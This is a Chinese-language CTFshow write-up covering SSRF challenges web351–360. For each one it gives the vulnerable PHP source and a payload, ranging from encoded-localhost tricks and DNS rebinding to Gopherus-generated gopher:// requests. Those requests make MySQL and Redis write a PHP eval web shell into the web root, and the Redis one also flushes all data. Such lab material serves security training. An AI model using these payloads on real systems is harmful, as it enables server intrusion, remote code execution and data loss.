CTFshow——SSRF

文章目录

web351——

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

1.curl_init()   初始化cURL，返回资源给$ch

2.curl_setopt()	设置一个cURL传输选项
bool curl_setopt ( resource $ch , int $option , mixed $value )
参数一：curl资源		参数二：设置的请求选项	参数三：请求选项的值

CURLOPT_HEADER	        启用时会将头文件的信息作为数据流输出。
URLOPT_RETURNTRANSFER	将curl_exec()获取的信息以文件流的形式返回，而不是直接输出。

3.curl_exec()执行cURL资源，并传递给浏览器

4.curl_close()关闭cURL资源

直接访问flag.php，提示非本地用户禁止访问。因此通过代码传参让服务器访问flag.php，也就是SSRF了

payload:
url=http://127.0.0.1/flag.php

web352、353——黑名单过滤

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    
    
if(!preg_match('/localhost|127.0.0/')){
    
    
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    
    
    die('hacker');
}
}
else{
    
    
    die('hacker');
}
?>

parse_url():本函数解析一个URL并返回一个关联数组，包含在URL中出现的各种组成部分。

黑名单过滤了localhost和127.0.0

127可用进制绕过：

127(10)=0x7f(16)=0177(8)
127被以上代换，在本地ping 127.0.0.1也是成功的

可利用一个在线网站：IP地址转化为进制地址https://tool.520101.com/wangluo/jinzhizhuanhuan/

payload:
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php
url=http://0.0.0.0/flag.php 	     	 0.0.0.0代表本机
url=http://0x7F000001/flag.php  		16进制地址
url=http://2130706433/flag.php			10进制地址
url=http://127.1    					简写

web354——DNS-Rebinding攻击绕过

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    
    
if(!preg_match('/localhost|1|0|。/i', $url)){
    
    
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    
    
    die('hacker');
}
}
else{
    
    
    die('hacker');
}
?>

过滤了1和0，束手无策。看师傅们的解法是将自己的域名DNS绑定为127.0.0.1 这算长见识了。
1.在http://ceye.io/网站注册
2.绑定127.0.0.1（第一个IP地址任意，第二个绑127.0.0.1）
在这里插入图片描述

3.如图得到了域名i868u4.ceye.io
POST传参：url=http://r.i868u4.ceye.io/flag.php注意域名前面有个r

此外，还有在自己的网站上写重定向文件的做法

web355——

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    
    
$host=$x['host'];
if((strlen($host)<=5)){
    
    
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    
    
    die('hacker');
}
}
else{
    
    
    die('hacker');
}
?>

$host要求小于等于5

url=http://127.1/flag.php

web356——Linux与windows下的 ping 0

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    
    
$host=$x['host'];
if((strlen($host)<=3)){
    
    
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    
    
    die('hacker');
}
}
else{
    
    
    die('hacker');
}
?>

在这里插入图片描述

0在windows中被解析为0.0.0.0。在Linux中被解析为127.0.0.1

web357——DNS-Rebinding攻击绕过

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    
    
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    
    
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    
    
    die('scheme');
}
?>

gethostbyname()：查找主机名最基本的函数。
如果调用成功，它就返回一个指向hostent结构的指针，该结构中含有所查找主机的所有IPv4地址。这个函数的局限是只能返回IPv4地址.


filter_var(variable, filter, options)函数通过指定的过滤器过滤一个变量。
• 返回值
• 如果成功，则返回被过滤的数据。
• 如果失败，则返回 FALSE。

FILTER_VALIDATE_IP 过滤器把值作为 IP 进行验证。

可能的标志：
• FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP（比如 255.255.255.255）
• FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP（比如 2001:0db8:85a3:08d3:1319:8a2e:0370:7334）
• FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP （比如 192.168.0.1）
• FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。该标志接受 IPV4 和 IPV6 值。

要求IP地址不能是私有地址
继续DNS Rebinding
在http://ceye.io/网站注册然后类似web354的做法

web358——parse_url()

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    
    
    echo file_get_contents($url);
}

正则要求：以http://ctf.开头，以show结尾
这题考察了parse_url()，举个例子：

						 parse_url()  
						 
<?php
$url = 'http://username:password@hostname/path?arg=value#anchor';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);
?>
结果----------------------------------------------------------------------------------------------------
Array
(
    [scheme] => http
    [host] => hostname			//
    [user] => username			@前
    [pass] => password			@前
    [path] => /path				/
    [query] => arg=value		?以后的key=value
    [fragment] => anchor		#以后的部分
)
	/path

这有一篇更详细的文章：parse_url小结

回到本题~
在这里插入图片描述

payload:
url=http://[email protected]/flag.php?show
访问的是：127.0.0.1

web359——Gopher协议打MySQL

Gopher协议打MySQL
具体原理：https://www.freebuf.com/articles/web/260806.html

先下载Gopherus

git clone https://github.com/tarunkant/Gopherus.git

python gopherus.py

在这里插入图片描述

Give MySQL username: root                                                                                                                                    
Give query to execute: select '<?php eval($_POST[1]);?>' into outfile '/var/www/html/6.php'

1.输入上述指令便可得到一大串字符

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%36%2e%70%68%70%27%01%00%00%00%01

2.将这些字符串（下划线_以后的字符串）进行URL编码(当然，将整段字符URL编码也是可以的)，浏览器会对此url进行一次解码，解码后的url可能会含特殊字符，curl提交时需再次编码.

%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2545%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2536%252e%2570%2568%2570%2527%2501%2500%2500%2500%2501

3.最后在check.php页面POST传参

returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2545%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2536%252e%2570%2568%2570%2527%2501%2500%2500%2500%2501

4.至此6.php已经生成，访问6.php进行一句话木马执行

web360——Gopher协议打Redis

与上题的操作是类似的
在这里插入图片描述

python gopherus.py --exploit redis

url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252428%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255B1%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2fvar%2fwww%2fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
这里我将得到的字符均URL编码，效果是一样的

之后再访问shell.php…然后getshell~